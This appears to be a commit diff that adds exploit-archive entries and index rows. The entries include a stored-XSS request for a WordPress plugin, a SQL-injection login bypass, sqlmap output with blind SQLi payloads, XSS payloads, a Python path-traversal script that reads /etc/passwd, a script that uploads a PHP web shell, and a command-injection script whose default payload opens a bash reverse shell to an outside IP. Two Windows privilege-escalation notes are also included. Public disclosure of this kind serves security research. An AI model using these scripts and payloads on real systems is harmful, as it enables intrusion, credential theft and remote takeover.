+# POC -  Stored-XSS
+
+POST /wp-admin/options-general.php?page=wp-paginate.php HTTP/1.1
+Host: localhost
+Content-Length: 348
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://localhost/wp-admin/options-general.php?page=wp-paginate.php
+Accept-Encoding: gzip, deflate
+Accept-Language: ko,en-US;q=0.9,en;q=0.8
+Cookie:
+wordpress_5b1d7751a3da8a97505638936b7963ae=root%7C1609175102%7CsmSXDMcLQrRT6VE8KfGkKmVhXgpnCEAYtWIzvd91r78%7C94877ae306a5c59f9cdb81adc60a8cd6ad84e0e7551b18042ee0a33c9ab5cb31;
+wordpress_test_cookie=WP%20Cookie%20check;
+asp_transient_id=36985e31f4be2b5ae0e14586c592c87d;
+wp-settings-1=mfold%3Do%26editor%3Dhtml%26posts_list_mode%3Dlist%26unfold%3D1;
+wp-settings-time-1=1609001802;
+wordpress_logged_in_5b1d7751a3da8a97505638936b7963ae=root%7C1609175102%7CsmSXDMcLQrRT6VE8KfGkKmVhXgpnCEAYtWIzvd91r78%7Cd570540f18447db0f0859be9e8e14bab64da22c8cf50fb8a80ebea73f188cb48
+Connection: close
+
+_wpnonce=8441c7c7b9&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-paginate.php&title=Pages%3A&previouspage=%26laquo%3B&nextpage=%26raquo%3B&position=none&font=font-inherit&preset=default&
+*preset='%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3e*
+&before=%3Cdiv+class%3D%22navigation%22%3E&after=%3C%2Fdiv%3E&empty=on&css=on&range=3&anchor=1&gap=3&wp_paginate_save=Save+Changes

exploits/php/webapps/49356.txt

@@ -0,0 +1,11 @@
+# Exploit Title: Online Movie Streaming  1.0 - Authentication Bypass
+# Date: 2020-12-27
+# Exploit Author:  Kshitiz Raj (manitorpotterk)
+# Vendor Homepage: https://www.sourcecodester.com/php/14640/online-movie-streaming-php-full-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14640&title=+Online+Movie+Streaming+in+PHP+with+Full+Source+Code
+# Version: 1.0
+# Tested on: Windows 10/Kali Linux
+
+Step 1 -  Go to url http://localhost/onlinemovie/user-login.php
+Step 2 – Enter Username :-   anything@mail.com
+Step 3 -  Enter Password - ' or '1'='1'#

exploits/php/webapps/49357.txt

@@ -0,0 +1,83 @@
+# Exploit Title: Responsive E-Learning System 1.0 – 'id' Sql Injection
+# Date: 2020-12-24
+# Exploit Author: Kshitiz Raj(manitorpotterk)
+# Vendor Homepage: https://www.sourcecodester.com/php/5172/responsive-e-learning-system.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=5172&title=Responsive+E-Learning+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested on: Windows 10/Kali Linux
+
+The 'id=' parameter in Responsive E-Learning System is vulnerable to Sql
+Injection.
+
+*Vulnerable Url : *http://localhost/elearning/delete_teacher_students.php?id=17
+-p <http://localhost/elearning/delete_teacher_students.php?id=17%0D-p> id
+
+# sqlmap -u
+http://192.168.127.1//elearning/delete_teacher_students.php?id=17 -p id
+
+        ___
+
+
+__H__
+
+
+ ___ ___["]_____ ___ ___
+{1.3.11#stable}
+
+|_ -| . [.]     | .'| .
+|
+
+|___|_  [']_|_|_|__,|
+_|
+
+      |_|V...       |_|   http://sqlmap.org
+
+
+
+
+[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
+mutual consent is illegal. It is the end user's responsibility to obey all
+applicable local, state and federal laws. Developers assume no liability
+and are not responsible for any misuse or damage caused by this program
+
+
+
+[*] starting @ 08:59:01 /2020-12-24/
+
+
+08:59:33] [INFO] checking if the injection point on GET parameter 'id' is a
+false positive
+
+GET parameter 'id' is vulnerable. Do you want to keep testing the others
+(if any)? [y/N] y
+
+sqlmap identified the following injection point(s) with a total of 402
+HTTP(s) requests:
+
+---
+
+Parameter: id (GET)
+
+    Type: boolean-based blind
+
+    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or
+GROUP BY clause
+
+    Payload: id=17' RLIKE (SELECT (CASE WHEN (7532=7532) THEN 17 ELSE 0x28
+END))-- YDSn
+
+
+
+    Type: time-based blind
+
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+
+    Payload: id=17' AND (SELECT 4939 FROM (SELECT(SLEEP(5)))EQuU)-- RaGm
+
+---
+
+[08:59:38] [INFO] the back-end DBMS is MySQL
+
+web application technology: PHP 7.2.34, Apache 2.4.46
+
+back-end DBMS: MySQL >= 5.0.12

exploits/php/webapps/49358.txt

@@ -0,0 +1,13 @@
+# Exploit Title: Baby Care System 1.0 - 'Post title' Stored XSS
+# Exploit Author: Hardik Solanki
+# Vendor Homepage: https://www.sourcecodester.com/php/14622/baby-care-system-phpmysqli-full-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14622&title=Baby+Care+System+in+PHP%2FMySQLi+with+Full+Source+Code+
+# Version: 1
+# Tested on Windows
+
+Vulnerable Parameters: Edit Page tab
+
+Steps to reproduce:
+1: Log in with a valid username and password. Navigate to the "Post" tab on the left-hand side.
+2: Add the new post and then add the payload "<audio src/onerror=alert(document.cookie)>" in "Post title" parameter and click on save button. Post Saved successfully.
+3: Now, XSS will get stored and trigger every time and the attacker can steal authenticated users' cookies.

exploits/php/webapps/49359.py

@@ -0,0 +1,64 @@
+# Exploit Title: Responsive FileManager 9.13.4 - 'path' Path Traversal
+# Date: 12/12/2018 (PoC)
+# Date: 04/01/2020 (Auto Exploit)
+# Exploit Author: SunCSR (Sun* Cyber Security Research)
+# Google Dork: intitle:"Responsive FileManager 9.x.x"
+# Vendor Homepage: http://responsivefilemanager.com/
+# Software Link: https://github.com/trippo/ResponsiveFilemanager/releases/tag/v9.13.4
+# Version: < 9.13.4
+# Tested on: Linux 64bit + Python3
+
+#!/usr/bin/python3
+
+# Usage: python exploit.py [URL] [SESSION] [File Path]
+# python3 exploit.py http://local.lc:8081 PHPSESSID=hfpg2g4rdpvmpgth33jn643hq4 /etc/passwd
+
+import requests
+import sys
+
+def usage():
+	if len(sys.argv) != 4:
+	print("Usage: python3 exploit.py [URL]")
+	sys.exit(0)
+
+def copy_cut(url, session_cookie, file_name):
+	headers = {'Cookie': session_cookie,
+	'Content-Type': 'application/x-www-form-urlencoded'}
+	url_copy = "%s/filemanager/ajax_calls.php?action=copy_cut" % (url)
+	r = requests.post(
+	url_copy, data="sub_action=copy&path=../../../../../../.."+file_name,headers=headers)
+	return r.status_code
+
+def paste_clipboard(url, session_cookie):
+	headers = {'Cookie': session_cookie,'Content-Type': 'application/x-www-form-urlencoded'}
+	url_paste = "%s/filemanager/execute.php?action=paste_clipboard" % (url)
+	r = requests.post(
+	url_paste, data="path=", headers=headers)
+	return r.status_code
+
+def read_file(url, file_name):
+	name_file = file_name.split('/')[-1]
+	url_path = "%s/source/%s" % (url,name_file) #This is the default directory,
+	#if the website is a little different, edit this place
+	result = requests.get(url_path)
+	return result.text
+
+def main():
+	usage()
+	url = sys.argv[1]
+	session_cookie = sys.argv[2]
+	file_name = sys.argv[3]
+	print("[*] Copy Clipboard")
+	copy_result = copy_cut(url, session_cookie, file_name)
+	if copy_result==200:
+		paste_result = paste_clipboard(url, session_cookie)
+	else:
+		print("[-] Paste False")
+	if paste_result==200:
+		print("[*] Paste Clipboard")
+		print(read_file(url, file_name))
+	else:
+		print("[-] Copy False")
+
+if __name__ == "__main__":
+	main()

exploits/php/webapps/49364.txt

@@ -0,0 +1,32 @@
+# Exploit Title: CSZ CMS 1.2.9 - Multiple Cross-Site Scripting
+# Date: 2020/12/28
+# Exploit Author: SunCSR
+# Vendor Homepage: https://www.cszcms.com/
+# Software Link: https://github.com/cskaza/cszcms
+# Version: 1.2.9
+# Tested on: CSZ CMS 1.2.9
+
+1. Reflected XSS
+Go to url http://localhost/pluginabc%22%2Dalert%28origin%29%2D%22abc
+<http://localhost/pluginabc%22-alert%28origin%29-%22abc>
+
+2. Stored XSS
+
+Use an editor account with rights to manage banners, plugins.
+
++ Banner Manager:
+    - Add or edit banner:
+    Name field: <noframes><p title="</noframes><svg/onload=alert(origin)>">
+    Note field: <noframes><p title="</noframes><svg/onload=alert(origin)>">
+
++ Plugin Manager:
+    - Add or edit album(/admin/plugin/gallery):
+    Album Name field: <noframes><p
+title="</noframes><svg/onload=alert(origin)>">
+    Keyword field: <noframes><p title="</noframes><svg/onload=alert(origin)>">
+    Short Description field: <noframes><p
+title="</noframes><svg/onload=alert(origin)>">
+
+    - Add or edit Category(/admin/plugin/article/):
+    Category Name field: <noframes><p
+title="</noframes><svg/onload=alert(origin)>">

exploits/php/webapps/49365.py

@@ -0,0 +1,32 @@
+# Exploit Title: Online Learning Management System 1.0 - RCE (Authenticated)
+# Date: 01.01.2021
+# Exploit Author: Bedri Sertkaya
+# Vendor Homepage: https://www.sourcecodester.com/php/7339/learning-management-system.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=7339&title=Online+Learning+Management+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested on: Windows 10 / WAMP Server
+
+import requests
+
+cmd = "start cmd.exe" # Command to execute
+target = "http://192.168.1.101/lms" #
+username = "21100867"
+password = "heni"
+# Login and get session_cookie
+url = target+"/login.php"
+headers = {"Accept": "*/*", "X-Requested-With": "XMLHttpRequest", "User-A=gent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML=, like Gecko) Chrome/87.0.4280.88 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Origin": "http://192.168.1.10=1", "Referer": "http://192.168.1.101/lms/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}
+data = {"username": username, "password": password}
+s = requests.post(url, headers=headers, data=data)
+session_cookie = s.cookies.get_dict()
+
+# Upload Shell
+burp0_url = target+"/student_avatar.php"
+burp0_cookies = session_cookie
+burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": "http://192.168.1.101", "Content-Type": "multipart/form-data; boundary----WebKitFormBoundarybHBgGwgOFblz5IgL", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0=.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.1.101/lms/student_notification.php", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}
+burp0_data = "------WebKitFormBoundarybHBgGwgOFblz5IgL\r\nContent-Disposition: form-data; name=\"image\"; filename=\"exploit.php\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php\r\nshell_exec('"+cmd+"');\r\n------WebKitFormBoundarybHBgGwgOFblz5IgL\r\nContent-Disposition: form-data; name=\"change\"\r\n\r\n\r\n------WebKitFormBoundarybHBgGwgOFblz5IgL--\r\n"
+requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
+
+# Trigger exploit
+trigger_url = "http://192.168.1.101:80/lms/admin/uploads/exploit.php"
+trigger_cookies = session_cookie
+requests.get(trigger_url, cookies=trigger_cookies)

exploits/php/webapps/49366.py

@@ -0,0 +1,97 @@
+# Exploit Title: Klog Server 2.4.1 - Command Injection (Unauthenticated)
+# Date: 22.12.2020
+# Exploit Author: b3kc4t (Mustafa GUNDOGDU)
+# Vendor Homepage: https://www.klogserver.com/
+# Version: 2.4.1
+# Tested On: Ubuntu 18.04
+# CVE: 2020-35729
+# Description: https://github.com/mustgundogdu/Research/tree/main/KLOG_SERVER
+
+"""
+         ~ VULNERABILITY DETAILS ~
+    
+    #
+    The Klog Server runs the injected os commands on the server , causing os command
+    injection vulnerability.    
+    
+    #
+    The following python code will inject os command payload and can be relaized reverse
+    shell connection.And you can be added payload except the default payload plugin.
+
+    ##USAGE##
+
+    $sudo nc -nlvp 98
+    $sudo python klog_exploit.py --exploit --url https://10.10.56.51:443/actions/authenticate.php --payload "test\"$bash -i >& /dev/tcp/10.10.56.52/98 0>&1&\""
+
+    ##OUTPUT##
+
+    bash-4.2$whoami
+    apache
+    bash-4.2$
+
+"""
+
+import requests
+import argparse
+from colorama import Fore, Back, Style, init
+
+
+def main():
+    
+    desc = "KLOG SERVER 2.4.1 EXPLOIT"
+    parser = argparse.ArgumentParser(description=desc)
+    option = parser.add_argument_group('[*]OPTIONS[*]')
+    parser.add_argument("--url", help=Fore.GREEN+"[*]TARGET URL ADDRESS[*]", required=False)
+    parser.add_argument("--payload",help=Fore.GREEN+"[*] TO ADD PAYLOAD  [*]", type=str,required=False)
+    parser.add_argument("--exploit", help=Fore.GREEN+" ", action="store_true")
+    args = parser.parse_args()
+    
+    if args.exploit:
+
+        if args.url:
+            url = args.url
+            
+            if args.payload:
+                payload = args.payload
+                target_send_config(url, payload)
+            
+            #default bash reverse shell payload
+            else:
+                payload = "test\"&bash -i >& /dev/tcp/10.10.56.52/88 0>&1&\""
+                target_send_config(url, payload)
+
+        else:
+            #default url (klog server init ip address)
+            url = "https://10.10.56.51:443/actions/authenticate.php"
+            
+            if args.payload:
+                payload = args.payload
+                target_send_config(url, payload)
+            else: 
+                payload = "test\"&bash -i >& /dev/tcp/10.10.56.52/88 0>&1&\""
+                target_send_config(url, payload)
+
+
+def target_send_config(url, payload):
+        
+    headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0", 
+                "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", 
+                "Accept-Language": "en-US,en;q=0.5", 
+                "Accept-Encoding": "gzip, deflate", 
+                "Content-Type": "application/x-www-form-urlencoded", 
+                "Connection": "close", 
+                "Upgrade-Insecure-Requests": "1"}
+    #injection place
+    data = {"user": payload, 
+            "pswd": "test"}
+    
+    try:
+    #post method send    
+        requests.post(url, headers=headers, data=data, verify=False)
+        print(" ")
+        print(Fore.GREEN+" "+"[+] EXPLOIT SUCCESSFUL PAYLOAD IS SENT [+]")
+    except:
+        print(Fore.RED+"[-] EXPLOIT FAILED [-]")
+
+if __name__ == '__main__':
+    main()

exploits/windows/local/49350.txt

@@ -0,0 +1,41 @@
+# Exploit Title: Intel(R) Matrix Storage Event Monitor x86 8.0.0.1039 - 'IAANTMON' Unquoted Service Path
+# Date: 2021-01-04
+# Exploit Author: Geovanni Ruiz
+# Vendor Homepage: https://www.intel.com
+# Software Version: 8.0.0.1039
+# File Version: 8.0.0.1039
+# Tested on: Microsoft® Windows Vista Business 6.0.6001 Service Pack 1 x64es
+
+# 1. To find the unquoted service path vulnerability
+
+C:\>wmic service where 'name like "%IAANTMON%"' get name, displayname,
+pathname, startmode, startname
+
+DisplayName                             Name    PathName
+                                              StartMode  StartName
+Intel(R) Matrix Storage Event Monitor  IAANTMON C:\Program Files
+(x86)\Intel\Intel Matrix Storage Manager\IAANTMon.exe   Auto
+LocalSystem
+
+# 2. To check service info:
+
+C:\>sc qc "IAANTMON"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: IAANTMON
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Intel\Intel Matrix
+Storage Manager\IAANTMon.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Intel(R) Matrix Storage Event Monitor
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
+
+# 3. Exploit:
+
+To exploit this vulnerability an attacker requires to drop a malicious
+executable into the service path undetected by the OS in order
+to gain SYSTEM privileges.

exploits/windows/local/49363.txt

@@ -0,0 +1,33 @@
+# Exploit Title: Fluentd TD-agent plugin 4.0.1 - Insecure Folder Permission
+# Date: 21.12.2020
+# Exploit Author: Adrian Bondocea
+# Vendor Homepage: https://www.fluentd.org/
+# Software Link: https://td-agent-package-browser.herokuapp.com/4/windows
+# Version: <v4.0.1
+# Tested on: Windows 10 x64
+# CVE : CVE-2020-28169
+# External URL: https://github.com/zubrahzz/FluentD-TD-agent-Exploit-CVE-2020-28169
+
+Description:
+The td-agent-builder plugin before 2020-12-18 for Fluentd allows attackers to gain privileges because the bin directory is writable by a user account, but a file in bin is executed as NT AUTHORITY\SYSTEM.
+
+Vulnerable Path: ( Authenticated Users have permission to write within the location )
+PS C:\opt\td-agent\bin> icacls C:\opt\td-agent\bin
+C:\opt\td-agent\bin BUILTIN\Administrators:(I)(OI)(CI)(F)
+                    NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
+                    BUILTIN\Users:(I)(OI)(CI)(RX)
+                    NT AUTHORITY\Authenticated Users:(I)(M)
+                    NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
+
+Successfully processed 1 files; Failed processing 0 files
+
+Vulnerable service:
+PS C:\opt\td-agent\bin> get-service fluentdwinsvc
+
+Status   Name               DisplayName
+------   ----               -----------
+Running  fluentdwinsvc      Fluentd Windows Service
+
+Service Path:
+"C:/opt/td-agent/bin/ruby.exe" -C t"C:/opt/td-agent/lib/ruby/gems/2.7.0/gems/fluentd-1.11.2/lib/fluent/command/.."
+ winsvc.rb --service-name fluentdwinsvc

files_exploits.csv

@@ -11236,6 +11236,8 @@ id,file,description,date,author,type,platform,port
 49322,exploits/windows/local/49322.py,"10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow (SEH)",2020-12-22,"Florian Gassner",local,windows,
 49336,exploits/windows/local/49336.txt,"MiniTool ShadowMaker 3.2 - 'MTAgentService' Unquoted Service Path",2021-01-04,"Thalia Nieto",local,windows,
 49342,exploits/python/local/49342.txt,"Knockpy 4.1.1 - CSV Injection",2021-01-04,"Dolev Farhi",local,python,
+49350,exploits/windows/local/49350.txt,"Intel(R) Matrix Storage Event Monitor x86 8.0.0.1039 - 'IAANTMON' Unquoted Service Path",2021-01-05,"Geovanni Ruiz",local,windows,
+49363,exploits/windows/local/49363.txt,"Fluentd TD-agent plugin 4.0.1 - Insecure Folder Permission",2021-01-05,"Adrian Bondocea",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -43559,3 +43561,19 @@ id,file,description,date,author,type,platform,port
 49346,exploits/php/webapps/49346.txt,"Subrion CMS 4.2.1 - 'avatar[path]' XSS",2021-01-04,icekam,webapps,php,
 49347,exploits/multiple/webapps/49347.txt,"Click2Magic 1.1.5 - Stored Cross-Site Scripting",2021-01-04,"Shivam Verma",webapps,multiple,
 49348,exploits/windows/webapps/49348.py,"Arteco Web Client DVR/NVR - 'SessionId' Brute Force",2021-01-04,LiquidWorm,webapps,windows,
+49351,exploits/multiple/webapps/49351.html,"IncomCMS 2.0 - Insecure File Upload",2021-01-05,MoeAlBarbari,webapps,multiple,
+49352,exploits/php/webapps/49352.txt,"House Rental and Property Listing 1.0 - Multiple Stored XSS",2021-01-05,"Mohamed habib Smidi",webapps,php,
+49353,exploits/php/webapps/49353.txt,"Resumes Management and Job Application Website 1.0 - Authentication Bypass (Sql Injection)",2021-01-05,"Kshitiz Raj",webapps,php,
+49354,exploits/php/webapps/49354.txt,"WordPress Plugin Stripe Payments 2.0.39 - 'AcceptStripePayments-settings[currency_code]' Stored XSS",2021-01-05,"Park Won Seok",webapps,php,
+49355,exploits/php/webapps/49355.txt,"WordPress Plugin WP-Paginate 2.1.3 - 'preset' Stored XSS",2021-01-05,"Park Won Seok",webapps,php,
+49356,exploits/php/webapps/49356.txt,"Online Movie Streaming  1.0 - Authentication Bypass",2021-01-05,"Kshitiz Raj",webapps,php,
+49357,exploits/php/webapps/49357.txt,"Responsive ELearning System 1.0 - 'id' Sql Injection",2021-01-05,"Kshitiz Raj",webapps,php,
+49358,exploits/php/webapps/49358.txt,"Baby Care System 1.0 - 'Post title' Stored XSS",2021-01-05,"Hardik Solanki",webapps,php,
+49359,exploits/php/webapps/49359.py,"Responsive FileManager 9.13.4 - 'path' Path Traversal",2021-01-05,"Sun* Cyber Security Research Team",webapps,php,
+49360,exploits/linux/webapps/49360.py,"Zoom Meeting Connector 4.6.239.20200613 - Remote Root Exploit (Authenticated)",2021-01-05,"Jeremy Brown",webapps,linux,
+49361,exploits/multiple/webapps/49361.py,"HPE Edgeline Infrastructure Manager 1.0 - Multiple Remote Vulnerabilities",2021-01-05,"Jeremy Brown",webapps,multiple,
+49362,exploits/linux/webapps/49362.py,"Cassandra Web 0.5.0 - Remote File Read",2021-01-05,"Jeremy Brown",webapps,linux,
+49364,exploits/php/webapps/49364.txt,"CSZ CMS 1.2.9 - Multiple Cross-Site Scripting",2021-01-05,SunCSR,webapps,php,
+49365,exploits/php/webapps/49365.py,"Online Learning Management System 1.0 - RCE (Authenticated)",2021-01-05,"Bedri Sertkaya",webapps,php,
+49366,exploits/php/webapps/49366.py,"Klog Server 2.4.1 - Command Injection (Unauthenticated)",2021-01-05,B3KC4T,webapps,php,
+49367,exploits/multiple/webapps/49367.txt,"EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Multiple Stored Cross-Site Scripting",2021-01-05,"Mesut Cetin",webapps,multiple,